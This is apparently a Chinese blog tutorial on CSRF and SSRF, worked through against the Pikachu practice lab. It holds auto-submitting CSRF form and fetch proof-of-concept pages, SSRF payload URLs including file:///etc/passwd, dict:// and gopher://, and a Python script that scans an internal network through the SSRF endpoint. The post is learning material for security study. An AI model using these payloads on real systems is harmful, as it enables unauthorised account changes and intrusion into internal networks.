CSRF&SSRF

已于 2024-03-08 03:46:04 修改
阅读量324 收藏 8
点赞数 11
文章标签: csrf 前端
于 2024-03-01 17:55:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49714982/article/details/136398793
版权

CSRF

一、原理:

跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。实际上是攻击者借用了受害者的Session,欺骗服务器进行操作。

二、利用:

1.修改用户信息
2.利用身份发送邮件、短信
3.利用身份转账
4.盗取账号

三、方式

1.GET

直接把可以修改用户信息或者进行转账操作进行抓包分析,可以看到该数据包使用get方式把用户地址改为了aaa,则可以拼接域名和后面参数。在发给受害者,如果受害者这时登录在http://localhost/pikachu/vul/csrf/csrfget/csrf_get.php中受害者用户信息将被更改。

http://localhost//pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=aaa&email=vince%40pikachu.com&submit=submit

2.POST

同样进行抓包,可以看到这次改为了POST提交,使用bp的csrf poc生成,将该数据包改为前端代码,将该html代码写入自己的服务器的index.html,再将自己服务器的连接发给受害者,即可完成和GET同样的操作。

但是该html代码需要点击按钮才能执行,我们需要一个受害者只要进入就能执行的代码。

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form id="myfrom" method="post" action="http://localhost/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
      <input type="hidden" name="sex" value="undefine" />
      <input type="hidden" name="phonenum" value="18626545453" />
      <input type="hidden" name="add" value="moon" />
      <input type="hidden" name="email" value="vince&#64;pikachu&#46;com" />
      <button id='btn'  type="hidden" name="submit" value="submit" />
    </form>
	<script>
	document.getElementById("btn").click();
	</script>
  </body>
</html>

将button的type="hidden"使按钮隐藏,并且自动点击俺就以执行提交表单的操作,附上一个不进行页面访问直接传参的代码,需要CORS不进行跨域请求禁止

<!DOCTYPE html>  
<html >  
<head> 
  <meta charset="UTF-8">

  <title>CSRF PoC - Asynchronous Request</title>  
</head>  
<body>  
  <!-- CSRF PoC - generated by Burp Suite Professional -->  
  <script>  
    // 定义要发送的数据  
    const data = {  
      sex: 'man',  
      phonenum: '18628572334',  
      add: 'usa',  
      email: 'vince@pikachu.com'  
    };  
  
    // 使用fetch API发送POST请求  
    fetch('http://localhost/pikachu/vul/csrf/csrfpost/csrf_post_edit.php', {  
      method: 'POST', // 或者 'POST'  
      headers: {  
        'Content-Type': 'application/json' // 根据实际情况可能需要更改  
      },  
      body: JSON.stringify(data) // 将JavaScript对象转换为JSON字符串  
    })  
    .then(response => {  
      // 请求成功,这里可以处理响应  
      console.log('Response:', response);  
      // 如果需要获取返回的文本内容,可以使用下面的代码  
      // return response.text();  
    })  
    .catch(error => {  
      // 请求失败,这里可以处理错误  
      console.error('Error:', error);  
    });  
  </script>  
</body>  
</html>

四、绕过

1.token绕过

五、工具

Xray

SSRF

一、原理:

SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。

二、利用:

探测内网主机存活、访问内网主机文件

三、方式:

有三种引发SSRF漏洞的函数:

1.file_get_contents() 进行内网文件读取

localhost/pikachu/vul/ssrf/ssrf_fgc.php?file=http://127.0.0.1/pikachu/vul/ssrf/ssrf_info/info2.php

2.curl_exec() 进行内网探针

localhost/pikachu/vul/ssrf/ssrf_curl.php?url=http://{193.168.9.23}:{8080}

import requests
session=requests.session()
url="http://localhost/pikachu/vul/ssrf/ssrf_curl.php"
for i in range(0,255):
    for j in range(0,255):
        target = f"http://192.168.{i}.{j}"
        rurl_res = session.get(f'{url}?url={target}')
        if (rurl_res.elapsed.total_seconds() < 4):
            print(f"存活主机:http://192.168.{i}.{j}\n")

3.fsockopen()

四、URL伪协议

file:/// 从文件系统中获取文件内容,如,file:///etc/passwd
dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:
sftp:// SSH文件传输协议或安全文件传输协议
ldap:// 轻量级目录访问协议
tftp:// 简单文件传输协议
gopher:// 分布式文档传递服务,可使用gopherus生成payload

例如:

http:192.168.1.6/phpmyadmin/
file:///D:/www.txt
dict://192.168.1.6:3306/info
ftp://192.168.1.6:21

五、可能存在漏洞的传参点和网站有SSRF漏洞的功能点

传参点:

share  wap  url  link  src  source  target  u  3g  display  domain  sourceURL  imageURL

功能点:

1.图片上传、下载功能,可能通过url参数访问资源

2.收藏功能,可能会包含含收藏的目标地址

3.分享功能,可能会包含分享网站的目标地址

4.API接口,可能会包含下载参数

login_upset
关注
40、WEB攻防——通用漏洞&CSRF&SSRF&代码审计&同源策略&加载函数
qq_55202378的博客
01-30 736
抓取添加管理员的用户名和密码的数据包,形成html文件,并放到公网服务器上。(2)尝试在网站任何可上传地方,上传数据包文件,取得当前同域名访问地址。这个采集模块,服务器会根据你给的URL进行访问,说明存在SSRF。登录后台的状态下访问刚刚那个文件,CSRF攻击完成。,需要在html代码数据包文件中固定。文件夹,这里是用到了框架。如何对CSRF进行测试?按照之前的方法,找不到。
小迪安全39WEB 攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用
weixin_73760178的博客
03-12 1170
11.未公开的api实现以及其他扩展调用URL的功能:可以利用google 语法(inurl:)加上这些关键字去寻找SSRF漏洞一些的url中的关键字: share. wap、 url、 link. src、 source. target. U、3g、 display、sourceURI、imageURL. domain..这些是都会向服务器去请求我们所发送的信息,若配置不当,我们输入了访问它自身的地址,则会回显出它自身的情况。举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但。
第39天:WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用
wuqingsix的博客
11-28 1257
跨站请求伪造,通常缩写为CSRF或者XSRF,举个生活中的例子:就是某个人点了个奇怪的链接,自己什么也没输,但自己的qq号或其他的号就被盗了。即该攻击可以在受害者不知情的情况下以受害者名义伪造请求,执行恶意操作,具有很大的危害性。
Web安全通用漏洞--CSRF&SSRF--协议玩法--漏洞利用
weixin_68243135的博客
11-28 717
Web攻防--CSRF--SSRF漏洞原理,利用
39、WEB攻防——通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用
qq_55202378的博客
01-30 1373
设置代理,会抓取新建管理员时向服务器发送的数据包,然后用抓取的数据包构造HTML页面。这里没有token,说明只要是这个用户就行了,不需要证明发送数据包的是不是同一个主机。肯定允许访问,如果直接从百度访问新建文章的URL,也允许访问,说明不存在同源策略。总的来说:如果网站接收你的值,并且会把这个值进行资源访问,就可能存在SSRF。的值,本身网站的数据包认定安全,不是本身网站发送的数据包为非法数据包。关键验证就好比,修改密码的时候会验证你的用户名和密码。同源策略也不安全,如果改。的值,同源策略就失效了。
pikachu--CSRF & SSRF
weixin_44769042的博客
09-10 327
1.CSRF Cross-Site Request Forgery 跨站请求伪造 y原理 :当我们打开或登录某个网站,浏览器与网站所存放的服务器会产生一个会话,之后一段时间,所有通过这个认证会话的请求,都会被视为可信的动作,比如此时你正登录网上银行,正在转账,此时攻击者构造恶意转账代码,当你不小心点击它时,就会完成相应的转账操作,因为此时浏览器认为这是可信的正常操作。 在pikachu上验证: (1)攻击场景(GET) 点击修改信息,用burpsuite抓包,...
网络安全之CSRF&SSRF漏洞(上篇)(技术进阶)
weixin_70911257的博客
04-17 551
CSRF(Cross-site request forgery)简称:跨站请求伪造,存在巨大的危害性。是攻击者制造一个请求(一般是一个链接)诱导用户去点击,从而通过用户去访问正常的网站用攻击者伪造的请求去对网站发送一个请求。攻击的前提:1,有这个漏洞(自己弄个号来攻击自己,成功了就说明有这个漏洞)2,用户已经登录了3,要知道协议包的结构(不然怎么伪造请求呢)4,浏览器支持(如没有同源策略)5,用户点击并打开恶意网站皮卡丘靶场为例:环境:受害者为主机,虚拟机搭建恶意网站。
csrf&ssrf漏洞详解
weixin_56714714的博客
07-25 1492
CSRF 什么是CSRF? 跨站请求伪造也叫CSRF/XSRF 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。如下:其中Web A为存在CSRF漏洞的网站,Web B为攻击者构建的恶意网站,User C为Web A网站的合法用户。 CSRF攻击的危害 CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求 CSRF危害:以你的名义发送邮件,发
CSRF&SSRF简析
ChanCherry的博客
10-19 667
跨站请求伪造,是一种对网站的恶意利用。XSS利用站点内地信任用户,而CSRF通过伪装来自信任用户的请求来利用受信任的网站。与XSS相比,CSRF攻击往往不大流行(因此对其防范的资源也相对较少)和难以防范,所以被认为比XSS更具危险性。一个场景,跨域发出了一个请求,可以无JavaScript参加,请求是身份认证后的。一般分为HTML CSRF,JOSN HiJacking攻击和Flash CSRF。...
csrfssrf漏洞的原理是?如何防御和利用csrfssrf漏洞
DXfighting_的博客
04-14 957
Csrf原理: CSRF是一种依赖web浏览器的、被混淆过的代理人攻击。 防御csrf漏洞: 验证token,验证HTTP请求的Referer,还有验证XMLHttpRequests里的自定义header Ssrf漏洞原理: 很多web应用都提供了从其他的服务器上获取数据的功能。使用指定的URL,web应用便可以获取图片,下载文件,读取文件内容等。SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用S
CSRFSSRF与XXE
j1044957016的博客
05-31 665
文章目录前言一、CSRF1.CSRF的简介2.CSRF的防御与检测二、SSRF1.SSRF简介2.SSRF容易出现的地方3.SSRF会造成的危害4.防御措施总结 前言 系统的梳理下CSRFSSRF的知识点 一、CSRF 1.CSRF的简介 CSRF又称跨站请求伪造,XSS就是CSRF中的一种。跨站请求伪造指的是伪造客户端请求。 发生条件: 用户在正常网站A登录的情况下 访问了保存有恶意代码的另一个网站B B网站劫持用户的登陆状态以用户的身份对网站A发送请求,一般是劫持了COOKIE信息。 当服务端对这
XSS、CSRFSSRF漏洞原理以及防御方式
Love_Naive的博客
09-03 5371
这里写目录标题XSSXSS攻击原理:XSS的防范措施主要有三个:编码、过滤、校正CSRFCSRF攻击攻击原理及过程如下:CSRF攻击的防范措施:SSRFSSRF漏洞攻击原理以及方式SSRF漏洞攻击的防范措施XMLXSS、CSRFSSRF的区别XSS、CSRF的区别 XSS XSS(Cross Site Scripting):跨域脚本攻击。 XSS攻击原理: 不需要你做任何的登录认证,它会通过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、hmtl代码块等)。 X
Web安全 - 跨站点请求伪造CSRF(Cross Site Request Forgery)
小工匠
09-29 1155
CSRF (Cross-Site Request Forgery,跨站请求伪造) 是一种攻击方式,攻击者诱导用户在不知情的情况下发起非授权的请求。例如,用户在登录某个站点后,攻击者通过社交工程等手段诱使用户点击包含恶意请求的链接,利用用户已登录的状态,发起用户意图之外的操作,如转账、修改账户设置等。:在每次受保护的请求中,服务器生成一个唯一的CSRF Token,注入到表单或请求头中。:对于敏感操作,可以要求用户进行额外的身份验证,如验证码或短信验证,防止攻击者即便利用用户的认证状态,也无法完成关键操作。
登录功能开发 P167重点
最新发布
2303_81204446的博客
09-30 231
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 478
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
前端规范工程-2:JS代码规范(Prettier + ESLint)
Vinca@的博客
09-26 789
Prettier 主要关注代码的格式,而 ESLint 则关注代码的质量和规范。结合使用这两个工具,可以极大地提高代码的可读性和维护性,同时减少潜在的错误和不一致性。
前端面试经验总结2(经典问题篇)
rita_0567的博客
09-28 916
因为计算机技术的快速发展,所以程序员如果不能保持对技术的持续性学习,会更容易的被淘汰,我从来不觉得程序员是一个轻松的职业,但是程序员是我最热爱的职业,我做好了充足的准备让自己能够长期在前端行业深耕。既要扩充自己的知识宽度,同时又不要一味的追求学习的东西越多越来,今天学两天这个,明天学两天那个,工作中又没有得到使用的话,很快也都会忘记的。了解,贵公司主要是在xxx行业从事xxx业务,贵公司所处的行业是我非常看好的,我感觉贵公司的氛围我很喜欢,比如xxxx。遇到了哪些挑战,我如何在不利的条件下成长起来的。
基于webComponents的纯原生前端框架
u013776700的博客
09-28 187
采用artComponent模板引擎,在数据更新后实现UI更新,当然这里做了优化处理,尽量减小页面渲染受影响的范围,实现最小化更新。基于框架,开发了一套常用UI组件,提升开发速度。组件库采用开放原则,也就是说别人都可以使用我的开发接口去开发组件库。我本人的个人开发web前端前框架xui,正在开发中,业已完成50%的核心开发工作,并且在开发过程中逐渐完善.目前框架未采用任何和市面上框架模式,没有打包过程,实现真实的开箱即用。框架完成了事件触发和事件监听的封装,在页面和组件事件处理上更加方便。
csrfssrf区别
08-06
回答: CSRFSSRF 是两种不同的攻击方式。 CSRF(Cross-Site Request Forgery,跨站请求伪造)攻击是由于服务器没有对用户提交的数据进行严格的控制,导致攻击者可以利用用户的身份信息(如 cookie)伪造用户身份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值